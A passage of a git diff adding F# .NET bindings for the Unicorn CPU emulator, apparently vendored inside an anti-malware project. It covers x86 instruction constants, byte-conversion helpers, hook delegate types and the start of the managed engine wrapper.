UC_X86_INS_VFNMADD231SS = 859 + let UC_X86_INS_VFNMSUB132PD = 860 + let UC_X86_INS_VFNMSUB132PS = 861 + let UC_X86_INS_VFNMSUBPD = 862 + let UC_X86_INS_VFNMSUB213PD = 863 + let UC_X86_INS_VFNMSUB231PD = 864 + let UC_X86_INS_VFNMSUBPS = 865 + let UC_X86_INS_VFNMSUB213PS = 866 + let UC_X86_INS_VFNMSUB231PS = 867 + let UC_X86_INS_VFNMSUBSD = 868 + let UC_X86_INS_VFNMSUB213SD = 869 + let UC_X86_INS_VFNMSUB132SD = 870 + let UC_X86_INS_VFNMSUB231SD = 871 + let UC_X86_INS_VFNMSUBSS = 872 + let UC_X86_INS_VFNMSUB213SS = 873 + let UC_X86_INS_VFNMSUB132SS = 874 + let UC_X86_INS_VFNMSUB231SS = 875 + let UC_X86_INS_VFRCZPD = 876 + let UC_X86_INS_VFRCZPS = 877 + let UC_X86_INS_VFRCZSD = 878 + let UC_X86_INS_VFRCZSS = 879 + let UC_X86_INS_VORPD = 880 + let UC_X86_INS_VORPS = 881 + let UC_X86_INS_VXORPD = 882 + let UC_X86_INS_VXORPS = 883 + let 
UC_X86_INS_VGATHERDPD = 884 + let UC_X86_INS_VGATHERDPS = 885 + let UC_X86_INS_VGATHERPF0DPD = 886 + let UC_X86_INS_VGATHERPF0DPS = 887 + let UC_X86_INS_VGATHERPF0QPD = 888 + let UC_X86_INS_VGATHERPF0QPS = 889 + let UC_X86_INS_VGATHERPF1DPD = 890 + let UC_X86_INS_VGATHERPF1DPS = 891 + let UC_X86_INS_VGATHERPF1QPD = 892 + let UC_X86_INS_VGATHERPF1QPS = 893 + let UC_X86_INS_VGATHERQPD = 894 + let UC_X86_INS_VGATHERQPS = 895 + let UC_X86_INS_VHADDPD = 896 + let UC_X86_INS_VHADDPS = 897 + let UC_X86_INS_VHSUBPD = 898 + let UC_X86_INS_VHSUBPS = 899 + let UC_X86_INS_VINSERTF128 = 900 + let UC_X86_INS_VINSERTF32X4 = 901 + let UC_X86_INS_VINSERTF32X8 = 902 + let UC_X86_INS_VINSERTF64X2 = 903 + let UC_X86_INS_VINSERTF64X4 = 904 + let UC_X86_INS_VINSERTI128 = 905 + let UC_X86_INS_VINSERTI32X4 = 906 + let UC_X86_INS_VINSERTI32X8 = 907 + let UC_X86_INS_VINSERTI64X2 = 908 + let UC_X86_INS_VINSERTI64X4 = 909 + let UC_X86_INS_VINSERTPS = 910 + let UC_X86_INS_VLDDQU = 911 + let UC_X86_INS_VLDMXCSR = 912 + let UC_X86_INS_VMASKMOVDQU = 913 + let UC_X86_INS_VMASKMOVPD = 914 + let UC_X86_INS_VMASKMOVPS = 915 + let UC_X86_INS_VMAXPD = 916 + let UC_X86_INS_VMAXPS = 917 + let UC_X86_INS_VMAXSD = 918 + let UC_X86_INS_VMAXSS = 919 + let UC_X86_INS_VMCALL = 920 + let UC_X86_INS_VMCLEAR = 921 + let UC_X86_INS_VMFUNC = 922 + let UC_X86_INS_VMINPD = 923 + let UC_X86_INS_VMINPS = 924 + let UC_X86_INS_VMINSD = 925 + let UC_X86_INS_VMINSS = 926 + let UC_X86_INS_VMLAUNCH = 927 + let UC_X86_INS_VMLOAD = 928 + let UC_X86_INS_VMMCALL = 929 + let UC_X86_INS_VMOVQ = 930 + let UC_X86_INS_VMOVDDUP = 931 + let UC_X86_INS_VMOVD = 932 + let UC_X86_INS_VMOVDQA32 = 933 + let UC_X86_INS_VMOVDQA64 = 934 + let UC_X86_INS_VMOVDQA = 935 + let UC_X86_INS_VMOVDQU16 = 936 + let UC_X86_INS_VMOVDQU32 = 937 + let UC_X86_INS_VMOVDQU64 = 938 + let UC_X86_INS_VMOVDQU8 = 939 + let UC_X86_INS_VMOVDQU = 940 + let UC_X86_INS_VMOVHLPS = 941 + let UC_X86_INS_VMOVHPD = 942 + let UC_X86_INS_VMOVHPS = 943 + let UC_X86_INS_VMOVLHPS 
= 944 + let UC_X86_INS_VMOVLPD = 945 + let UC_X86_INS_VMOVLPS = 946 + let UC_X86_INS_VMOVMSKPD = 947 + let UC_X86_INS_VMOVMSKPS = 948 + let UC_X86_INS_VMOVNTDQA = 949 + let UC_X86_INS_VMOVNTDQ = 950 + let UC_X86_INS_VMOVNTPD = 951 + let UC_X86_INS_VMOVNTPS = 952 + let UC_X86_INS_VMOVSD = 953 + let UC_X86_INS_VMOVSHDUP = 954 + let UC_X86_INS_VMOVSLDUP = 955 + let UC_X86_INS_VMOVSS = 956 + let UC_X86_INS_VMOVUPD = 957 + let UC_X86_INS_VMOVUPS = 958 + let UC_X86_INS_VMPSADBW = 959 + let UC_X86_INS_VMPTRLD = 960 + let UC_X86_INS_VMPTRST = 961 + let UC_X86_INS_VMREAD = 962 + let UC_X86_INS_VMRESUME = 963 + let UC_X86_INS_VMRUN = 964 + let UC_X86_INS_VMSAVE = 965 + let UC_X86_INS_VMULPD = 966 + let UC_X86_INS_VMULPS = 967 + let UC_X86_INS_VMULSD = 968 + let UC_X86_INS_VMULSS = 969 + let UC_X86_INS_VMWRITE = 970 + let UC_X86_INS_VMXOFF = 971 + let UC_X86_INS_VMXON = 972 + let UC_X86_INS_VPABSB = 973 + let UC_X86_INS_VPABSD = 974 + let UC_X86_INS_VPABSQ = 975 + let UC_X86_INS_VPABSW = 976 + let UC_X86_INS_VPACKSSDW = 977 + let UC_X86_INS_VPACKSSWB = 978 + let UC_X86_INS_VPACKUSDW = 979 + let UC_X86_INS_VPACKUSWB = 980 + let UC_X86_INS_VPADDB = 981 + let UC_X86_INS_VPADDD = 982 + let UC_X86_INS_VPADDQ = 983 + let UC_X86_INS_VPADDSB = 984 + let UC_X86_INS_VPADDSW = 985 + let UC_X86_INS_VPADDUSB = 986 + let UC_X86_INS_VPADDUSW = 987 + let UC_X86_INS_VPADDW = 988 + let UC_X86_INS_VPALIGNR = 989 + let UC_X86_INS_VPANDD = 990 + let UC_X86_INS_VPANDND = 991 + let UC_X86_INS_VPANDNQ = 992 + let UC_X86_INS_VPANDN = 993 + let UC_X86_INS_VPANDQ = 994 + let UC_X86_INS_VPAND = 995 + let UC_X86_INS_VPAVGB = 996 + let UC_X86_INS_VPAVGW = 997 + let UC_X86_INS_VPBLENDD = 998 + let UC_X86_INS_VPBLENDMB = 999 + let UC_X86_INS_VPBLENDMD = 1000 + let UC_X86_INS_VPBLENDMQ = 1001 + let UC_X86_INS_VPBLENDMW = 1002 + let UC_X86_INS_VPBLENDVB = 1003 + let UC_X86_INS_VPBLENDW = 1004 + let UC_X86_INS_VPBROADCASTB = 1005 + let UC_X86_INS_VPBROADCASTD = 1006 + let UC_X86_INS_VPBROADCASTMB2Q = 1007 + 
let UC_X86_INS_VPBROADCASTMW2D = 1008 + let UC_X86_INS_VPBROADCASTQ = 1009 + let UC_X86_INS_VPBROADCASTW = 1010 + let UC_X86_INS_VPCLMULQDQ = 1011 + let UC_X86_INS_VPCMOV = 1012 + let UC_X86_INS_VPCMPB = 1013 + let UC_X86_INS_VPCMPD = 1014 + let UC_X86_INS_VPCMPEQB = 1015 + let UC_X86_INS_VPCMPEQD = 1016 + let UC_X86_INS_VPCMPEQQ = 1017 + let UC_X86_INS_VPCMPEQW = 1018 + let UC_X86_INS_VPCMPESTRI = 1019 + let UC_X86_INS_VPCMPESTRM = 1020 + let UC_X86_INS_VPCMPGTB = 1021 + let UC_X86_INS_VPCMPGTD = 1022 + let UC_X86_INS_VPCMPGTQ = 1023 + let UC_X86_INS_VPCMPGTW = 1024 + let UC_X86_INS_VPCMPISTRI = 1025 + let UC_X86_INS_VPCMPISTRM = 1026 + let UC_X86_INS_VPCMPQ = 1027 + let UC_X86_INS_VPCMPUB = 1028 + let UC_X86_INS_VPCMPUD = 1029 + let UC_X86_INS_VPCMPUQ = 1030 + let UC_X86_INS_VPCMPUW = 1031 + let UC_X86_INS_VPCMPW = 1032 + let UC_X86_INS_VPCOMB = 1033 + let UC_X86_INS_VPCOMD = 1034 + let UC_X86_INS_VPCOMPRESSD = 1035 + let UC_X86_INS_VPCOMPRESSQ = 1036 + let UC_X86_INS_VPCOMQ = 1037 + let UC_X86_INS_VPCOMUB = 1038 + let UC_X86_INS_VPCOMUD = 1039 + let UC_X86_INS_VPCOMUQ = 1040 + let UC_X86_INS_VPCOMUW = 1041 + let UC_X86_INS_VPCOMW = 1042 + let UC_X86_INS_VPCONFLICTD = 1043 + let UC_X86_INS_VPCONFLICTQ = 1044 + let UC_X86_INS_VPERM2F128 = 1045 + let UC_X86_INS_VPERM2I128 = 1046 + let UC_X86_INS_VPERMD = 1047 + let UC_X86_INS_VPERMI2D = 1048 + let UC_X86_INS_VPERMI2PD = 1049 + let UC_X86_INS_VPERMI2PS = 1050 + let UC_X86_INS_VPERMI2Q = 1051 + let UC_X86_INS_VPERMIL2PD = 1052 + let UC_X86_INS_VPERMIL2PS = 1053 + let UC_X86_INS_VPERMILPD = 1054 + let UC_X86_INS_VPERMILPS = 1055 + let UC_X86_INS_VPERMPD = 1056 + let UC_X86_INS_VPERMPS = 1057 + let UC_X86_INS_VPERMQ = 1058 + let UC_X86_INS_VPERMT2D = 1059 + let UC_X86_INS_VPERMT2PD = 1060 + let UC_X86_INS_VPERMT2PS = 1061 + let UC_X86_INS_VPERMT2Q = 1062 + let UC_X86_INS_VPEXPANDD = 1063 + let UC_X86_INS_VPEXPANDQ = 1064 + let UC_X86_INS_VPEXTRB = 1065 + let UC_X86_INS_VPEXTRD = 1066 + let UC_X86_INS_VPEXTRQ = 1067 + 
let UC_X86_INS_VPEXTRW = 1068 + let UC_X86_INS_VPGATHERDD = 1069 + let UC_X86_INS_VPGATHERDQ = 1070 + let UC_X86_INS_VPGATHERQD = 1071 + let UC_X86_INS_VPGATHERQQ = 1072 + let UC_X86_INS_VPHADDBD = 1073 + let UC_X86_INS_VPHADDBQ = 1074 + let UC_X86_INS_VPHADDBW = 1075 + let UC_X86_INS_VPHADDDQ = 1076 + let UC_X86_INS_VPHADDD = 1077 + let UC_X86_INS_VPHADDSW = 1078 + let UC_X86_INS_VPHADDUBD = 1079 + let UC_X86_INS_VPHADDUBQ = 1080 + let UC_X86_INS_VPHADDUBW = 1081 + let UC_X86_INS_VPHADDUDQ = 1082 + let UC_X86_INS_VPHADDUWD = 1083 + let UC_X86_INS_VPHADDUWQ = 1084 + let UC_X86_INS_VPHADDWD = 1085 + let UC_X86_INS_VPHADDWQ = 1086 + let UC_X86_INS_VPHADDW = 1087 + let UC_X86_INS_VPHMINPOSUW = 1088 + let UC_X86_INS_VPHSUBBW = 1089 + let UC_X86_INS_VPHSUBDQ = 1090 + let UC_X86_INS_VPHSUBD = 1091 + let UC_X86_INS_VPHSUBSW = 1092 + let UC_X86_INS_VPHSUBWD = 1093 + let UC_X86_INS_VPHSUBW = 1094 + let UC_X86_INS_VPINSRB = 1095 + let UC_X86_INS_VPINSRD = 1096 + let UC_X86_INS_VPINSRQ = 1097 + let UC_X86_INS_VPINSRW = 1098 + let UC_X86_INS_VPLZCNTD = 1099 + let UC_X86_INS_VPLZCNTQ = 1100 + let UC_X86_INS_VPMACSDD = 1101 + let UC_X86_INS_VPMACSDQH = 1102 + let UC_X86_INS_VPMACSDQL = 1103 + let UC_X86_INS_VPMACSSDD = 1104 + let UC_X86_INS_VPMACSSDQH = 1105 + let UC_X86_INS_VPMACSSDQL = 1106 + let UC_X86_INS_VPMACSSWD = 1107 + let UC_X86_INS_VPMACSSWW = 1108 + let UC_X86_INS_VPMACSWD = 1109 + let UC_X86_INS_VPMACSWW = 1110 + let UC_X86_INS_VPMADCSSWD = 1111 + let UC_X86_INS_VPMADCSWD = 1112 + let UC_X86_INS_VPMADDUBSW = 1113 + let UC_X86_INS_VPMADDWD = 1114 + let UC_X86_INS_VPMASKMOVD = 1115 + let UC_X86_INS_VPMASKMOVQ = 1116 + let UC_X86_INS_VPMAXSB = 1117 + let UC_X86_INS_VPMAXSD = 1118 + let UC_X86_INS_VPMAXSQ = 1119 + let UC_X86_INS_VPMAXSW = 1120 + let UC_X86_INS_VPMAXUB = 1121 + let UC_X86_INS_VPMAXUD = 1122 + let UC_X86_INS_VPMAXUQ = 1123 + let UC_X86_INS_VPMAXUW = 1124 + let UC_X86_INS_VPMINSB = 1125 + let UC_X86_INS_VPMINSD = 1126 + let UC_X86_INS_VPMINSQ = 1127 + let 
UC_X86_INS_VPMINSW = 1128 + let UC_X86_INS_VPMINUB = 1129 + let UC_X86_INS_VPMINUD = 1130 + let UC_X86_INS_VPMINUQ = 1131 + let UC_X86_INS_VPMINUW = 1132 + let UC_X86_INS_VPMOVDB = 1133 + let UC_X86_INS_VPMOVDW = 1134 + let UC_X86_INS_VPMOVM2B = 1135 + let UC_X86_INS_VPMOVM2D = 1136 + let UC_X86_INS_VPMOVM2Q = 1137 + let UC_X86_INS_VPMOVM2W = 1138 + let UC_X86_INS_VPMOVMSKB = 1139 + let UC_X86_INS_VPMOVQB = 1140 + let UC_X86_INS_VPMOVQD = 1141 + let UC_X86_INS_VPMOVQW = 1142 + let UC_X86_INS_VPMOVSDB = 1143 + let UC_X86_INS_VPMOVSDW = 1144 + let UC_X86_INS_VPMOVSQB = 1145 + let UC_X86_INS_VPMOVSQD = 1146 + let UC_X86_INS_VPMOVSQW = 1147 + let UC_X86_INS_VPMOVSXBD = 1148 + let UC_X86_INS_VPMOVSXBQ = 1149 + let UC_X86_INS_VPMOVSXBW = 1150 + let UC_X86_INS_VPMOVSXDQ = 1151 + let UC_X86_INS_VPMOVSXWD = 1152 + let UC_X86_INS_VPMOVSXWQ = 1153 + let UC_X86_INS_VPMOVUSDB = 1154 + let UC_X86_INS_VPMOVUSDW = 1155 + let UC_X86_INS_VPMOVUSQB = 1156 + let UC_X86_INS_VPMOVUSQD = 1157 + let UC_X86_INS_VPMOVUSQW = 1158 + let UC_X86_INS_VPMOVZXBD = 1159 + let UC_X86_INS_VPMOVZXBQ = 1160 + let UC_X86_INS_VPMOVZXBW = 1161 + let UC_X86_INS_VPMOVZXDQ = 1162 + let UC_X86_INS_VPMOVZXWD = 1163 + let UC_X86_INS_VPMOVZXWQ = 1164 + let UC_X86_INS_VPMULDQ = 1165 + let UC_X86_INS_VPMULHRSW = 1166 + let UC_X86_INS_VPMULHUW = 1167 + let UC_X86_INS_VPMULHW = 1168 + let UC_X86_INS_VPMULLD = 1169 + let UC_X86_INS_VPMULLQ = 1170 + let UC_X86_INS_VPMULLW = 1171 + let UC_X86_INS_VPMULUDQ = 1172 + let UC_X86_INS_VPORD = 1173 + let UC_X86_INS_VPORQ = 1174 + let UC_X86_INS_VPOR = 1175 + let UC_X86_INS_VPPERM = 1176 + let UC_X86_INS_VPROTB = 1177 + let UC_X86_INS_VPROTD = 1178 + let UC_X86_INS_VPROTQ = 1179 + let UC_X86_INS_VPROTW = 1180 + let UC_X86_INS_VPSADBW = 1181 + let UC_X86_INS_VPSCATTERDD = 1182 + let UC_X86_INS_VPSCATTERDQ = 1183 + let UC_X86_INS_VPSCATTERQD = 1184 + let UC_X86_INS_VPSCATTERQQ = 1185 + let UC_X86_INS_VPSHAB = 1186 + let UC_X86_INS_VPSHAD = 1187 + let UC_X86_INS_VPSHAQ = 1188 + 
let UC_X86_INS_VPSHAW = 1189 + let UC_X86_INS_VPSHLB = 1190 + let UC_X86_INS_VPSHLD = 1191 + let UC_X86_INS_VPSHLQ = 1192 + let UC_X86_INS_VPSHLW = 1193 + let UC_X86_INS_VPSHUFB = 1194 + let UC_X86_INS_VPSHUFD = 1195 + let UC_X86_INS_VPSHUFHW = 1196 + let UC_X86_INS_VPSHUFLW = 1197 + let UC_X86_INS_VPSIGNB = 1198 + let UC_X86_INS_VPSIGND = 1199 + let UC_X86_INS_VPSIGNW = 1200 + let UC_X86_INS_VPSLLDQ = 1201 + let UC_X86_INS_VPSLLD = 1202 + let UC_X86_INS_VPSLLQ = 1203 + let UC_X86_INS_VPSLLVD = 1204 + let UC_X86_INS_VPSLLVQ = 1205 + let UC_X86_INS_VPSLLW = 1206 + let UC_X86_INS_VPSRAD = 1207 + let UC_X86_INS_VPSRAQ = 1208 + let UC_X86_INS_VPSRAVD = 1209 + let UC_X86_INS_VPSRAVQ = 1210 + let UC_X86_INS_VPSRAW = 1211 + let UC_X86_INS_VPSRLDQ = 1212 + let UC_X86_INS_VPSRLD = 1213 + let UC_X86_INS_VPSRLQ = 1214 + let UC_X86_INS_VPSRLVD = 1215 + let UC_X86_INS_VPSRLVQ = 1216 + let UC_X86_INS_VPSRLW = 1217 + let UC_X86_INS_VPSUBB = 1218 + let UC_X86_INS_VPSUBD = 1219 + let UC_X86_INS_VPSUBQ = 1220 + let UC_X86_INS_VPSUBSB = 1221 + let UC_X86_INS_VPSUBSW = 1222 + let UC_X86_INS_VPSUBUSB = 1223 + let UC_X86_INS_VPSUBUSW = 1224 + let UC_X86_INS_VPSUBW = 1225 + let UC_X86_INS_VPTESTMD = 1226 + let UC_X86_INS_VPTESTMQ = 1227 + let UC_X86_INS_VPTESTNMD = 1228 + let UC_X86_INS_VPTESTNMQ = 1229 + let UC_X86_INS_VPTEST = 1230 + let UC_X86_INS_VPUNPCKHBW = 1231 + let UC_X86_INS_VPUNPCKHDQ = 1232 + let UC_X86_INS_VPUNPCKHQDQ = 1233 + let UC_X86_INS_VPUNPCKHWD = 1234 + let UC_X86_INS_VPUNPCKLBW = 1235 + let UC_X86_INS_VPUNPCKLDQ = 1236 + let UC_X86_INS_VPUNPCKLQDQ = 1237 + let UC_X86_INS_VPUNPCKLWD = 1238 + let UC_X86_INS_VPXORD = 1239 + let UC_X86_INS_VPXORQ = 1240 + let UC_X86_INS_VPXOR = 1241 + let UC_X86_INS_VRCP14PD = 1242 + let UC_X86_INS_VRCP14PS = 1243 + let UC_X86_INS_VRCP14SD = 1244 + let UC_X86_INS_VRCP14SS = 1245 + let UC_X86_INS_VRCP28PD = 1246 + let UC_X86_INS_VRCP28PS = 1247 + let UC_X86_INS_VRCP28SD = 1248 + let UC_X86_INS_VRCP28SS = 1249 + let UC_X86_INS_VRCPPS = 
1250 + let UC_X86_INS_VRCPSS = 1251 + let UC_X86_INS_VRNDSCALEPD = 1252 + let UC_X86_INS_VRNDSCALEPS = 1253 + let UC_X86_INS_VRNDSCALESD = 1254 + let UC_X86_INS_VRNDSCALESS = 1255 + let UC_X86_INS_VROUNDPD = 1256 + let UC_X86_INS_VROUNDPS = 1257 + let UC_X86_INS_VROUNDSD = 1258 + let UC_X86_INS_VROUNDSS = 1259 + let UC_X86_INS_VRSQRT14PD = 1260 + let UC_X86_INS_VRSQRT14PS = 1261 + let UC_X86_INS_VRSQRT14SD = 1262 + let UC_X86_INS_VRSQRT14SS = 1263 + let UC_X86_INS_VRSQRT28PD = 1264 + let UC_X86_INS_VRSQRT28PS = 1265 + let UC_X86_INS_VRSQRT28SD = 1266 + let UC_X86_INS_VRSQRT28SS = 1267 + let UC_X86_INS_VRSQRTPS = 1268 + let UC_X86_INS_VRSQRTSS = 1269 + let UC_X86_INS_VSCATTERDPD = 1270 + let UC_X86_INS_VSCATTERDPS = 1271 + let UC_X86_INS_VSCATTERPF0DPD = 1272 + let UC_X86_INS_VSCATTERPF0DPS = 1273 + let UC_X86_INS_VSCATTERPF0QPD = 1274 + let UC_X86_INS_VSCATTERPF0QPS = 1275 + let UC_X86_INS_VSCATTERPF1DPD = 1276 + let UC_X86_INS_VSCATTERPF1DPS = 1277 + let UC_X86_INS_VSCATTERPF1QPD = 1278 + let UC_X86_INS_VSCATTERPF1QPS = 1279 + let UC_X86_INS_VSCATTERQPD = 1280 + let UC_X86_INS_VSCATTERQPS = 1281 + let UC_X86_INS_VSHUFPD = 1282 + let UC_X86_INS_VSHUFPS = 1283 + let UC_X86_INS_VSQRTPD = 1284 + let UC_X86_INS_VSQRTPS = 1285 + let UC_X86_INS_VSQRTSD = 1286 + let UC_X86_INS_VSQRTSS = 1287 + let UC_X86_INS_VSTMXCSR = 1288 + let UC_X86_INS_VSUBPD = 1289 + let UC_X86_INS_VSUBPS = 1290 + let UC_X86_INS_VSUBSD = 1291 + let UC_X86_INS_VSUBSS = 1292 + let UC_X86_INS_VTESTPD = 1293 + let UC_X86_INS_VTESTPS = 1294 + let UC_X86_INS_VUNPCKHPD = 1295 + let UC_X86_INS_VUNPCKHPS = 1296 + let UC_X86_INS_VUNPCKLPD = 1297 + let UC_X86_INS_VUNPCKLPS = 1298 + let UC_X86_INS_VZEROALL = 1299 + let UC_X86_INS_VZEROUPPER = 1300 + let UC_X86_INS_WAIT = 1301 + let UC_X86_INS_WBINVD = 1302 + let UC_X86_INS_WRFSBASE = 1303 + let UC_X86_INS_WRGSBASE = 1304 + let UC_X86_INS_WRMSR = 1305 + let UC_X86_INS_XABORT = 1306 + let UC_X86_INS_XACQUIRE = 1307 + let UC_X86_INS_XBEGIN = 1308 + let 
UC_X86_INS_XCHG = 1309 + let UC_X86_INS_XCRYPTCBC = 1310 + let UC_X86_INS_XCRYPTCFB = 1311 + let UC_X86_INS_XCRYPTCTR = 1312 + let UC_X86_INS_XCRYPTECB = 1313 + let UC_X86_INS_XCRYPTOFB = 1314 + let UC_X86_INS_XEND = 1315 + let UC_X86_INS_XGETBV = 1316 + let UC_X86_INS_XLATB = 1317 + let UC_X86_INS_XRELEASE = 1318 + let UC_X86_INS_XRSTOR = 1319 + let UC_X86_INS_XRSTOR64 = 1320 + let UC_X86_INS_XRSTORS = 1321 + let UC_X86_INS_XRSTORS64 = 1322 + let UC_X86_INS_XSAVE = 1323 + let UC_X86_INS_XSAVE64 = 1324 + let UC_X86_INS_XSAVEC = 1325 + let UC_X86_INS_XSAVEC64 = 1326 + let UC_X86_INS_XSAVEOPT = 1327 + let UC_X86_INS_XSAVEOPT64 = 1328 + let UC_X86_INS_XSAVES = 1329 + let UC_X86_INS_XSAVES64 = 1330 + let UC_X86_INS_XSETBV = 1331 + let UC_X86_INS_XSHA1 = 1332 + let UC_X86_INS_XSHA256 = 1333 + let UC_X86_INS_XSTORE = 1334 + let UC_X86_INS_XTEST = 1335 + let UC_X86_INS_FDISI8087_NOP = 1336 + let UC_X86_INS_FENI8087_NOP = 1337 + let UC_X86_INS_ENDING = 1338 + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/ConvertUtility.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/ConvertUtility.fs new file mode 100644 index 0000000..5e455bf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/ConvertUtility.fs @@ -0,0 +1,21 @@ +namespace UnicornManaged + +open System + +[] +module internal ConvertUtility = + + let int64ToBytes(v: Int64) = + let res = Array.zeroCreate 8 + let mutable uv = uint64 v + for i = 0 to res.Length-1 do + res.[i] <- byte (uv &&& uint64 0xFF) + uv <- uv >>> 8 + res + + let bytesToInt64(v: Byte array) = + let mutable res = uint64 0 + for i = 0 to v.Length-1 do + let tmpV = v.[i] &&& byte 0xFF + res <- res + (uint64 tmpV <<< (i * 8)) + int64 res \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/InternalHooks.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/InternalHooks.fs new file 
mode 100644 index 0000000..36cfc3c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/InternalHooks.fs @@ -0,0 +1,32 @@ +namespace UnicornManaged + +open System +open System.Runtime.InteropServices + +// internal hooks to be passed to native Unicorn library +[] +type internal CodeHookInternal = delegate of IntPtr * Int64 * Int32 * IntPtr -> unit + +[] +type internal BlockHookInternal = delegate of IntPtr * Int64 * Int32 * IntPtr -> unit + +[] +type internal InterruptHookInternal = delegate of IntPtr * Int32 * IntPtr -> unit + +[] +type internal MemReadHookInternal = delegate of IntPtr * Int64 * Int32 * IntPtr -> unit + +[] +type internal MemWriteHookInternal = delegate of IntPtr * Int64 * Int32 * Int64 * IntPtr -> unit + +[] +type internal EventMemHookInternal = delegate of IntPtr * Int32 * Int64 * Int32 * Int64 * IntPtr-> Boolean + +[] +type internal InHookInternal = delegate of IntPtr * Int32 * Int32 * IntPtr -> Int32 + +[] +type internal OutHookInternal = delegate of IntPtr * Int32 * Int32 * Int32 * IntPtr -> unit + +[] +type internal SyscallHookInternal = delegate of IntPtr * IntPtr -> unit \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Unicorn.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Unicorn.fs new file mode 100644 index 0000000..0a05d30 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Unicorn.fs @@ -0,0 +1,343 @@ +namespace UnicornManaged + +open System +open System.Threading +open System.Collections.Generic +open System.Runtime.InteropServices +open System.Linq +open UnicornManaged.Const +open UnicornManaged.Binding + +// exported hooks +type CodeHook = delegate of Unicorn * Int64 * Int32 * Object -> unit +and BlockHook = delegate of Unicorn * Int64 * Int32 * Object -> unit +and InterruptHook = delegate of Unicorn * Int32 * Object -> unit +and MemReadHook = delegate of Unicorn * 
Int64 * Int32 * Object -> unit +and MemWriteHook = delegate of Unicorn * Int64 * Int32 * Int64 * Object -> unit +and EventMemHook = delegate of Unicorn * Int32 * Int64 * Int32 * Int64 * Object -> Boolean +and InHook = delegate of Unicorn * Int32 * Int32 * Object -> Int32 +and OutHook = delegate of Unicorn * Int32 * Int32 * Int32 * Object -> unit +and SyscallHook = delegate of Unicorn * Object -> unit + +// the managed unicorn engine +and Unicorn(arch: Int32, mode: Int32, binding: IBinding) = + + // hook callback list + let _codeHooks = new List<(CodeHook * Object)>() + let _blockHooks = new List<(BlockHook * Object)>() + let _interruptHooks = new List<(InterruptHook * Object)>() + let _memReadHooks = new List<(MemReadHook * Object)>() + let _memWriteHooks = new List<(MemWriteHook * Object)>() + let _memEventHooks = new Dictionary>() + let _inHooks = new List<(InHook * Object)>() + let _outHooks = new List<(OutHook * Object)>() + let _syscallHooks = new List<(SyscallHook * Object)>() + let _disposablePointers = new List() + + let _eventMemMap = + [ + (UC_HOOK_MEM_READ_UNMAPPED, UC_MEM_READ_UNMAPPED) + (UC_HOOK_MEM_WRITE_UNMAPPED, UC_MEM_WRITE_UNMAPPED) + (UC_HOOK_MEM_FETCH_UNMAPPED, UC_MEM_FETCH_UNMAPPED) + (UC_HOOK_MEM_READ_PROT, UC_MEM_READ_PROT) + (UC_HOOK_MEM_WRITE_PROT, UC_MEM_WRITE_PROT) + (UC_HOOK_MEM_FETCH_PROT, UC_MEM_FETCH_PROT) + ] |> dict + + let mutable _eng = [|UIntPtr.Zero|] + + let checkResult(errCode: Int32, errMsg: String) = + if errCode <> Common.UC_ERR_OK then raise(ApplicationException(String.Format("{0}. 
Error: {1}", errMsg, errCode))) + + let hookDel(callbacks: List<'a * Object>) (callback: 'a)= + // TODO: invoke the native function in order to not call the trampoline anymore + callbacks + |> Seq.tryFind(fun item -> match item with | (c, _) -> c = callback) + |> (fun k -> if k.IsSome then callbacks.Remove(k.Value) |> ignore) + + let allocate(size: Int32) = + let mem = Marshal.AllocHGlobal(size) + _disposablePointers.Add(mem) + mem.ToPointer() + + do + // initialize event list + _eventMemMap + |> Seq.map(fun kv -> kv.Key) + |> Seq.iter (fun eventType -> _memEventHooks.Add(eventType, new List())) + + // init engine + _eng <- [|new UIntPtr(allocate(IntPtr.Size))|] + let err = binding.UcOpen(uint32 arch, uint32 mode, _eng) + checkResult(err, "Unable to open the Unicorn Engine") + + new(arch, mode) = new Unicorn(arch, mode, BindingFactory.getDefault()) + + member private this.CheckResult(errorCode: Int32) = + // return the exception instead of raising it in order to have a more meaningful stack trace + if errorCode <> Common.UC_ERR_OK then + let errorMessage = this.StrError(errorCode) + Some <| UnicornEngineException(errorCode, errorMessage) + else None + + member this.MemMap(address: Int64, size: Int64, perm: Int32) = + let size = new UIntPtr(uint64 size) + match binding.MemMap(_eng.[0], uint64 address, size, uint32 perm) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.MemMapPtr(address: Int64, size: Int64, perm: Int32, ptr: IntPtr) = + let size = new UIntPtr(uint64 size) + let ptr = new UIntPtr(ptr.ToPointer()) + match binding.MemMapPtr(_eng.[0], uint64 address, size, uint32 perm, ptr) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.MemUnmap(address: Int64, size: Int64) = + let size = new UIntPtr(uint64 size) + match binding.MemUnmap(_eng.[0], uint64 address, size) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.MemProtect(address: Int64, size: Int64, ?perm: Int32) = + let size = new 
UIntPtr(uint64 size) + let perm = defaultArg perm Common.UC_PROT_ALL + match binding.MemProtect(_eng.[0], uint64 address, size, uint32 perm) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.MemWrite(address: Int64, value: Byte array) = + match binding.MemWrite(_eng.[0], uint64 address, value, new UIntPtr(uint32 value.Length)) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.MemRead(address: Int64, memValue: Byte array) = + match binding.MemRead(_eng.[0], uint64 address, memValue, new UIntPtr(uint32 memValue.Length)) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.RegWrite(regId: Int32, value: Byte array) = + match binding.RegWrite(_eng.[0], regId, value) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.RegWrite(regId: Int32, value: Int64) = + this.RegWrite(regId, int64ToBytes value) + + member this.RegRead(regId: Int32, regValue: Byte array) = + match binding.RegRead(_eng.[0], regId, regValue) |> this.CheckResult with + | Some e -> raise e | None -> () + + member this.RegRead(regId: Int32) = + let buffer = 